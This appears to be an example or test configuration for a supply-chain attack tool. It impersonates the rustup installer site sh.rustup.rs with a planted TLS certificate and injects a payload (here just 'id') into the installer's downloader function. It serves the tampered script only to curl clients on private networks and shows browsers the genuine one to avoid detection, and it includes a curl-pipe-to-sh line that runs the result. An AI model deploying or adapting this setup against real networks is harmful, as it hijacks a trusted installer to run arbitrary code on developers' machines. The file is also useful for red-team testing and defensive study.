---

upstreams:
  rustup:
    url: https://sh.rustup.rs/

tls:
  names: ["sh.rustup.rs"]

check:
  image: archlinux
  install_certs: ['tee', '-a', '/etc/ssl/certs/ca-certificates.crt']
  register_hosts:
    - sh.rustup.rs
  cmds:
  - "curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs:${SH4D0WUP_BOUND_PORT} | sh -s -- -y"

# these aren't used but it's possible to pre-compute them as a static artifact
artifacts:
  orig:
    type: url
    url: https://sh.rustup.rs
  infect:
    type: infect
    infect: sh
    artifact: orig
    payload: id
    hook_functions: ['downloader']

selectors:
  target:
    type: all
    selectors:
      # only infect local computers
      - type: not
        selector: internet
      # only show the patched version to curl, no browsers
      - type: header
        key: user-agent
        regex: curl

  internet:
    type: all
    selectors:
      - type: not
        selector:
          type: ipaddr
          ipaddr: 10.0.0.0/8
      - type: not
        selector:
          type: ipaddr
          ipaddr: 192.168.0.0/16
      - type: not
        selector:
          type: ipaddr
          ipaddr: 127.0.0.0/8

routes:
  - path: /
    type: patch-shell
    selector: target
    args:
      upstream: rustup
      hook_functions: ['downloader']
      payload: |
        id
  - type: proxy
    args:
      upstream: rustup